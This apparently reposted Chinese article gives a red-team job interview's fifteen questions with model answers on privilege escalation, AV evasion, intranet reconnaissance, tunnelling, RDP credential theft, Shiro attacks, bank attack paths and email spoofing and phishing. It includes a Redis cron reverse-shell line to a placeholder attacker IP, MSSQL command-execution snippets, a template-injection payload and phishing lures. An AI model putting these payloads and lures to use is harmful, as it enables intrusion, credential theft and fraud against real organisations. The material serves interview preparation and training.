2025年渗透测试面试题总结-青藤云[校招]红队攻防岗(题目+回答)

article/2025/6/22 21:38:52

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 青藤云[校招]红队攻防岗

1. 数据库提权

2. Redis计划任务提权

3. 绕过杀软执行数据库命令

4. SQL Server提权方式

5. 内网信息收集

6. 免杀常见方式

7. Spring信息泄露与利用

8. 所有协议不出网的解决方案

9. ICMP出网利用方式

10. 判断出网方式

11. 邮件伪造与钓鱼技巧

12. 银行渗透思路

13. 获取RDP凭证

14. Shiro Key未知的利用思路

15. 邮件伪造绕过方案

 青藤云[校招]红队攻防岗

1. 说说数据库提权
2. redis的计划任务
3. 数据库提权,执行命令的时候遇到杀软咋办。
4. sqlserver提权的方式。
5. 内网如何进行信息收集。
6. 免杀的常见方式。
7. spring信息泄漏、其他利用方式。
8. 如果所有协议都不出网咋办?
9. icmp出网方式的利用。
10. 如何判断出网方式。
11. 邮件伪造、钓鱼的方式。
12. 面对一家银行有什么渗透思路。
13. 如何获取其他登陆主机的rdp凭证。
14. shiro找不到key,有什么思路。
15. 邮件伪造如何绕过。

1. 数据库提权

核心方式与示例

  1. MySQL
    • UDF提权:上传恶意SO/DLL文件到plugin_dir,注册函数执行命令(需secure_file_priv为空)。
    • 日志写入WebShell:通过general_log将代码写入Web目录。
  2. MSSQL
    • xp_cmdshell:启用后执行系统命令(EXEC sp_configure 'xp_cmdshell',1)。
    • CLR集成:加载恶意DLL调用PowerShell。
  3. PostgreSQL
    • COPY命令写文件:导出Payload到/var/www/html/shell.php
    • CVE-2019-9193:利用COPY FROM PROGRAM执行命令。
  4. Redis
    • 计划任务:写入/var/spool/cron/root(Linux)或启动项(Windows)。

2. Redis计划任务提权

利用流程

  1. 连接Redisredis-cli -h 目标IP
  2. 写入定时任务
    bashconfig set dir /var/spool/cron/ config set dbfilename root set x "\n* * * * * bash -i >& /dev/tcp/攻击IP/端口 0>&1\n" save 

限制条

  • Redis需以root权限运行。
  • 目标系统定时任务目录可写(如CentOS的/var/spool/cron/)。

3. 绕过杀软执行数据库命令

对抗方案

  1. 无文件执行:通过内存加载恶意代码(如PowerShell IEX)。
  2. 混淆加密
    • 对命令Base64编码:echo 'whoami' | base64d2hvYW1pCg==
    • 使用AES加密Shellcode。
  3. 合法进程注入
    • MSSQL调用rundll32.exe 加载合法DLL。
    • MySQL通过sys_exec调用系统工具(如certutil下载文件)。

4. SQL Server提权方式

常见方法

  1. xp_cmdshell:默认禁用,需启用(EXEC sp_configure 'show advanced options',1)。
  2. OLE自动化
    sqlDECLARE @shell INT; EXEC sp_oacreate 'WScript.Shell',@shell OUTPUT; EXEC sp_oamethod @shell,'Run',NULL,'cmd /c whoami'; 
  3. CLR集成
    • 编译恶意C# DLL,通过CREATE ASSEMBLY加载。
  4. 注册表操作
    • 利用xp_regwrite添加启动项或修改服务路径。

5. 内网信息收集

关键步骤

  1. 主机发现
    • ARP扫描(arp-scan -l)、ICMP探测(fping -g 网段)。
  2. 端口与服务识别
    • 使用nmap -sV识别服务版本,crackmapexec扫描SMB/WinRM。
  3. 凭证获取
    • 内存抓取(Mimikatz)、配置文件泄露(Tomcat web.xml )。
  4. 域渗透
    • BloodHound分析域关系,Kerberoasting攻击SPN账户。

6. 免杀常见方式

分类与示例

  1. 静态免杀
    • 代码混淆:VBA宏使用StrReverse隐藏字符串。
    • 合法签名:劫持带有微软签名的进程(如msbuild.exe )。
  2. 动态免杀
    • 进程空洞:通过Process Hollowing注入到合法进程。
    • 反射加载:PowerShell内存加载恶意DLL。
  3. 流量伪装
    • 使用DNS隧道(如dnscat2)或HTTPS加密通信。

7. Spring信息泄露与利用

漏洞场景

  1. 敏感端点
    • /actuator/env泄露数据库密码,/actuator/heapdump分析内存数据。
  2. 配置错误
    • spring.cloud.gateway.routes 未过滤,导致路由注入。
  3. 表达式注入
    • Thymeleaf模板中${T(Runtime).exec('calc')}执行命令。
  4. JDBC利用
    • 通过H2数据库的CREATE ALIAS创建Java函数执行代码。

8. 所有协议不出网的解决方案

突破思路

  1. DNS隧道:将数据封装在DNS查询中(工具:dnscat2)。
  2. ICMP隧道:利用icmpshpingtunnel传输数据。
  3. 物理接触:通过USB设备或恶意硬件(如橡皮鸭)横向移动。
  4. 第三方服务中转:利用云存储(如AWS S3)传递数据。

9. ICMP出网利用方式

工具与技巧

  1. icmpsh
    • 攻击端:./icmpsh_m.py 攻击IP 目标IP
    • 目标端:执行生成的Shellcode。
  2. 数据封装:将TCP流量封装到ICMP包中(需root权限)。
  3. 绕过检测
    • 限制ICMP包大小,使用加密避免特征检测。

10. 判断出网方式

探测方法

  1. 端口测试
    • curl http://攻击IP:80(检测HTTP出网)。
    • nslookup 攻击域名(检测DNS出网)。
  2. 协议探测
    • 使用nc -zv 攻击IP 443测试HTTPS。
    • 通过PowerShell Test-NetConnection检测ICMP/TCP。

11. 邮件伪造与钓鱼技巧

技术手段

  1. SPF/DKIM绕过
    • 使用相似域名(如paypa1.com )或免费邮箱服务(Gmail)。
  2. HTML欺骗
    • 隐藏真实链接:<a href="恶意URL">点击领取奖励</a>
  3. 附件利用
    • 携带恶意宏的Excel文件(伪装成“工资表.xlsm”)。
  4. 话术设计
    • 冒充IT部门:“系统升级,请重新登录验证”。

12. 银行渗透思路

攻击路径

  1. 信息收集
    • 子域名爆破(如online-banking.xxx.com )、员工邮箱搜集。
  2. 漏洞利用
    • Web漏洞:SQL注入转账接口、XSS劫持会话。
    • 内部系统:ATM网络暴露、SWIFT系统弱口令。
  3. 横向移动
    • 通过VPN漏洞进入内网,窃取数据库备份或加密机密钥。

13. 获取RDP凭证

方法与工具

  1. Mimikatz:抓取内存中的明文密码或Hash。
  2. 注册表提取
    • 导出HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers中的IP和用户名。
  3. 流量嗅探
    • 使用Wireshark捕获RDP协议流量,解密NLA(Network Level Authentication)。

14. Shiro Key未知的利用思路

绕过方案

  1. 密钥爆破:使用更大字典(如Shiro-550/721常见Key列表)。
  2. 反序列化链:利用CommonsBeanutils或CC链绕过加密。
  3. 权限绕过
    • 利用URL路径标准化(如/;/admin)绕过鉴权。

15. 邮件伪造绕过方案

技术细节

  1. SPF宽松策略
    • 目标域SPF设置为~all(软失败)时,伪造发件人。
  2. 中继服务器
    • 利用配置错误的邮件服务器(开放Open Relay)转发邮件。
  3. 附件混淆
    • 使用双重扩展名(如document.pdf.exe )诱骗点击。

http://www.hkcw.cn/article/IMfRThpoJu.shtml

相关文章

HCIP:MPLS LDP的原理和配置

目录 一、MPLS LDP的原理 1.回顾MPLS 2.MPLS LDP的基本概念 3.LDP的工作过程主要分为两部分 ​4.LDP会话&#xff1a; 5.LDP的对等体 6.LDP的消息 7.LDP工作原理 8.标签的发布和管理 二、MPLD LDP的实验配置 1.配置IP地址和OSPF 2.配置MPLS LDP 3.查看各个设备的…

这个地级市,“含潮量”全国顶流? 潮玩之都的转型之路

这个地级市,“含潮量”全国顶流? 潮玩之都的转型之路!东莞市中心矗立着一座12米高的巨型潮玩雕塑“劳拉”,其轮廓以彩色线条勾勒,充满科幻感。这座2021年落成的城市新地标脚下,延伸出一条由设计工作室、潮玩展销中心和沉浸式体验馆串联的“潮玩大道”。这里不定期举行沙龙…

男子机场取车遭一嗨租车拦车 店员态度恶劣引发争议

男子机场取车遭一嗨租车拦车 店员态度恶劣引发争议!6月2日,苏先生在昆明长水机场停车时遇到了麻烦。他将车停在B2层S1区C7车位,该车位未标注“专用车位”且无人值守。然而当他返回取车时,“一嗨租车”的工作人员告知他该车位已被他们租下,并称他的车停到了他们的店里。苏先…

今年第一批吃菌子中毒的人出现了!小伙吃野生菌后竟开始隔空抓凤凰

近日,云南临沧,胡先生吃野生菌后中毒致幻,躺在病床上隔空抓物。胡先生称自己看到了凤凰、乌贼、水母、蜘蛛、螃蟹......除胡先生外,此前一对昆明情侣因吃见手青中毒,在医院过的“520”近日,有IP地址为昆明的网友发帖称,自己和丈夫在家做菌子吃,结果两人都出现中毒症状,…

乒超联赛门票开售 雄安首迎顶尖赛事

6月9日至11日,2025赛季中国乒乓球俱乐部超级联赛常规赛第一阶段比赛将在河北雄安新区雄安体育中心体育馆举行。门票于6月3日18:00在秀动票务平台开售,票价从288元到788元不等。2025赛季乒超联赛包括男子和女子团体赛,分为三个阶段的常规赛和总决赛,从6月持续到12月。常规赛…

【iOS】ARC 与 Autorelease

ARC 与 Autorelease 文章目录 ARC 与 Autorelease前言何为ARC内存管理考虑方式自己生成的对象,自己持有非自己生成的对象,自己也可以持有不再需要自己持有的对象时释放非自己持有的对象无法释放 ARC的具体实现编译期和运行期ARC做的事情ARC实现: __autoreleasing 与 Autoreleas…

成都一断头路骑手受伤倒地不幸身亡

6月2日,一位网友发视频称,他在前往四川乐山游玩的路上误入成都一个胡同,发现一名摩托车骑手受伤倒在地上,于是帮忙拨打了120急救电话。该网友表示,此事于6月1日发生在成都天府新区东山大道三段附近一处路段,骑手因伤势过重离世,“如果能更早发现,或许还能被抢救回来。”…

媒体:汽车行业的价格战该“刹车”了 行业协会倡议维护健康发展

“618”限时促销活动期间,部分国内车企发起了大幅降价活动,最高直降5.3万元,这标志着新能源汽车市场新一轮“价格战”开始。山东交通广播汽车栏目制作人、资深汽车媒体人胡明表示,这次价格战始于一家车企在5月23日发起的大规模降价,主要原因是该品牌面临更多有竞争力的对手…

男子免费帮老人收麦被强行投喂饮料 河南老乡的热情感动麦客

男子免费帮老人收麦被强行投喂饮料 河南老乡的热情感动麦客!近日,多名跨区作业的麦客通过视频表达了对河南农民的热情感激。这些麦客在河南割麦子期间,不断收到当地老乡的“投喂”。宝歌(化名)是一位来自河北的麦客。5月28日至30日,他在河南漯河割麦子时,一天内收到了五…

76.解决消息重复生成bug

解决完编辑用户消息相关的bug之后重新生成又出现了新的新的新新的bug&#xff08;本飘心已死~&#xff09; 当点击重新重新生成按钮时会出现两个气泡&#xff1a; 这个bug出现的原因是&#xff1a;在regenerateResponse方法中&#xff0c;我们既重置了当前消息内容&#xff0c…

【Python连接数据库基础 01】从原生驱动到ORM框架:Python数据库连接完全指南

【Python连接数据库基础 01】从原生驱动到ORM框架&#xff1a;Python数据库连接完全指南 关键词&#xff1a;Python数据库连接、原生驱动、ORM框架、SQLAlchemy、PyMySQL、psycopg2、数据库编程、连接池、事务管理 摘要&#xff1a;本文从零开始讲解Python连接数据库的完整流程…

Oracle授权操作

目录 一、前置知识 1.使用ipconfig查看当前电脑的IP地址 2.查看Oracle数据库链接串 二、登录Oracle数据库 三、创建新用户、修改密码并授权 1.创建新用户并解锁 2.修改用户密码 3.授权用户登录 4.查看角色的权限范围 5.授予用户角色 6.撤销CONNECT角色 7.查看哪些用…

STM32:CAN总线精髓:特性、电路、帧格式与波形分析详解

声明&#xff1a;此博客是我的学习笔记&#xff0c;所看课程是江协科技的CAN总线课程&#xff0c;知识点都大同小异&#xff0c;我仅进行总结并加上了我自己的理解&#xff0c;所引案例也都是课程中的案例&#xff0c;希望对你的理解有所帮助&#xff01; 知识点1【CAN总线的概…

贾跃亭数度哽咽:散户救了我们的命,FF重生有望

6月3日,一段贾跃亭在首届“FFAI首年度股东日”活动上的讲话视频流出。一位从乐视早期就开始追随贾跃亭投资乐视和FF的股民自费从国内飞到洛杉矶参加活动,表达了对贾跃亭东山再起的期盼。贾跃亭在现场数度哽咽,表示FF能够存活下来主要归功于散户的支持。贾跃亭坦承,FF曾一度…

荣昌端午节旅游总收入近6亿元 文旅消费创新高

在刚刚过去的5月,荣昌区推出了一系列丰富多彩的旅游产品、文化活动和惠民举措,以满足游客多元化的个性化需求,多项数据创下历史新高。据荣昌区文旅委统计,5月1日至31日,全区共接待游客673.98万人次,同比增长224.31%;旅游总收入达377428.8万元,同比增长228.39%。具体来看…

哈佛大学寻求解冻儿童艾滋病研究拨款 法庭斗争持续

6月2日,哈佛大学请求一名联邦法官发布简易判决,以解冻特朗普政府自4月14日以来冻结的25亿美元资金。这些资金与国家安全威胁、癌症和传染病等研究相关。由于拒绝了白宫提出的一系列要求,哈佛大学收到了957份命令,要求冻结这些资金。在提交给法庭的文件中,哈佛大学详细说明…

Ubuntu22.04 安装 CUDA12.8

1.下载CUDA 由于我装完 Ubuntu22.04 后就自动带了最新的显卡驱动&#xff0c;就没有再去配置驱动。 先查看驱动能支持的CUDA最高版本&#xff0c;这里显示可支持到12.8。 nvidia-smi在CUDA的 说明文档 可查看CUDA对应的驱动版本要求。 在 CUDA Toolkit Archive 查找需要的 …

TomSolver 库 | config详解及其测试

一、C 关键特性解析 1. enum class 强类型枚举 enum class LogLevel { OFF, FATAL, ERROR, WARN, INFO, DEBUG, TRACE, ALL }; enum class NonlinearMethod { NEWTON_RAPHSON, LM };核心特性&#xff1a; 类型安全&#xff1a;禁止隐式转换为整数作用域限定&#xff1a;必须…

2025年—Comfy UI 和 Stable Diffusion底层原理

为什么要先讲SD原理 &#xff1f; 逻辑理解: ComfyUI是节点式操作&#xff0c;需要自行搭建工作流&#xff0c;理解原理才能灵活定制工作流学习效率: 基础原理不懂会导致后续学习吃力&#xff0c;原理是掌握ComfyUI的关键核心价值: ComfyUI最有价值的功能就是自主搭建工作流&a…

分糖果 两次遍历处理左右

这个题目本来打算两次遍历来写&#xff0c;但是细节处理上出了问题&#xff0c;我想的是距离两个1的距离最大值&#xff0c;但是其实并不是这样的&#xff0c;只有值递增的时候才能递增 题目地址 class Solution:def candy(self, ratings: List[int]) -> int:n len(ratings…